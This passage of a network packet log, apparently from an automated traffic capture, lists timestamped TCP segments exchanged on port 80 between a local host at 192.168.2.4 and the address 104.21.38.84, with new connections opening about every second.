                                                                                          Jan 4, 2025 11:08:57.301501036 CET8050102104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.301541090 CET5010280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.301570892 CET5010280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.301584959 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.301697969 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.306426048 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.654903889 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.659956932 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.659967899 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.659980059 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.777987957 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:57.828810930 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:57.960460901 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.014208078 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.023083925 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.028139114 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.028222084 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.030967951 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.035797119 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.335767031 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.340672970 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.340734005 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.340838909 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.345624924 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.389277935 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.394099951 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.394292116 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.498950958 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.561098099 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.686181068 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.691085100 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.691096067 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.691102982 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.759396076 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.784904957 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:58.811094046 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:58.826828003 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.051395893 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.109361887 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.167673111 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.167736053 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.168109894 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.168361902 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.172653913 CET8050104104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.172941923 CET8050105104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.173002958 CET5010480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.173022032 CET5010580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.173150063 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.173194885 CET8050103104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.173207998 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.173240900 CET5010380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.173322916 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.178126097 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.533533096 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.538382053 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.538393021 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.538434029 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.636214972 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.686094999 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.814384937 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.857975006 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.934452057 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.935112953 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.939460039 CET8050106104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.939513922 CET5010680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.939903975 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:59.940017939 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.940064907 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:59.944849968 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.295586109 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.300604105 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.300616026 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.300623894 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.408482075 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.482971907 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.585217953 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.670466900 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.699776888 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.700088978 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.704823971 CET8050107104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.704870939 CET5010780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.704900980 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:00.704957962 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.705059052 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:00.709842920 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.061202049 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.066214085 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.066227913 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.066239119 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.150696039 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.201729059 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.411451101 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.451729059 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.525567055 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.526359081 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.531971931 CET8050108104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.532037973 CET5010880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.532763958 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.532831907 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.532911062 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.539472103 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.889364004 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:01.894268036 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.894285917 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.894294977 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:01.997416973 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.076754093 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.256860971 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.401110888 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.402390957 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.406069040 CET8050109104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.406135082 CET5010980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.407171011 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.407234907 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.407355070 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.412153006 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.764400959 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:02.769328117 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.769340992 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.769351959 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.851553917 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:02.983015060 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.069988966 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.170542955 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.186554909 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.186793089 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.191618919 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.191629887 CET8050110104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.191704035 CET5011080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.191720963 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.191826105 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.196634054 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.545697927 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.550587893 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.550601006 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.550611019 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.766562939 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.767035961 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.813927889 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.813996077 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.814517021 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.814683914 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.814786911 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.815090895 CET8050111104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.815141916 CET5011180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.819576979 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.894385099 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.899195910 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:03.899300098 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.899383068 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:03.904165030 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.170648098 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.175576925 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.175658941 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.248646021 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.253561020 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.253571987 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.253581047 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.267805099 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.311216116 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.358613968 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.404880047 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.449250937 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.498620033 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.535705090 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.576832056 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.654628992 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.654671907 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.655270100 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.659557104 CET8050112104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.659615993 CET5011280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.659847021 CET8050113104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.659996033 CET5011380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.660073996 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:04.660139084 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.660221100 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:04.664988995 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.014300108 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.019232988 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.019248009 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.019254923 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.123142958 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.170578003 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.300973892 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.342441082 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.415785074 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.415993929 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.420769930 CET8050114104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.420839071 CET5011480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.420842886 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.420913935 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.420993090 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.425729990 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.780014038 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:05.785264969 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.785278082 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.785300970 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.885885954 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:05.936217070 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.342497110 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.374130011 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.374239922 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.466325998 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.466828108 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.471422911 CET8050115104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.471579075 CET5011580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.471652985 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.471724033 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.471796989 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.476521969 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.826807022 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:06.831680059 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.831692934 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.831705093 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.925226927 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:06.967381954 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.102653980 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.154881954 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.228770971 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.229100943 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.233967066 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.233987093 CET8050116104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.234035969 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.234057903 CET5011680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.234160900 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.238986015 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.592473984 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.597506046 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.597522020 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.597531080 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.698348999 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.748646975 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.878041029 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:07.920541048 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:07.998814106 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.001302004 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.004432917 CET8050117104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.004483938 CET5011780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.006139040 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.006197929 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.006273031 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.011096954 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.358241081 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.364506960 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.364646912 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.364656925 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.451647043 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.498652935 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.627876997 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.670536041 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.744620085 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.744970083 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.749788046 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.749856949 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.749919891 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.749939919 CET8050118104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:08.749984026 CET5011880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:08.754725933 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.108198881 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.113104105 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.113116026 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.113122940 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.202251911 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.248651028 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.380384922 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.420545101 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.452650070 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.452867031 CET5012080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.457761049 CET8050119104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.457773924 CET8050120104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.457817078 CET5011980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.457856894 CET5012080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.457957029 CET5012080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.462775946 CET8050120104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.493858099 CET5012080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.541963100 CET8050120104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.549329996 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.554200888 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.554272890 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.554349899 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.559154034 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.828109980 CET8050120104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.828161001 CET5012080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.905021906 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:09.909940958 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.909953117 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.909964085 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:09.997996092 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.045527935 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.255259991 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.295665026 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.370815039 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.371176004 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.376029015 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.376040936 CET8050121104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.376104116 CET5012180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.376118898 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.376216888 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.380974054 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.733086109 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:10.738003969 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.738014936 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.738023043 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.825119019 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:10.873667955 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.003950119 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.045665979 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.117682934 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.118202925 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.122754097 CET8050122104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.122800112 CET5012280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.123096943 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.123274088 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.123374939 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.128289938 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.467452049 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.472390890 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.472403049 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.472410917 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.592358112 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.639286995 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.855746031 CET8050123104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.904905081 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.978667974 CET5012480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.983544111 CET8050124104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:11.985559940 CET5012480192.168.2.4104.21.38.84
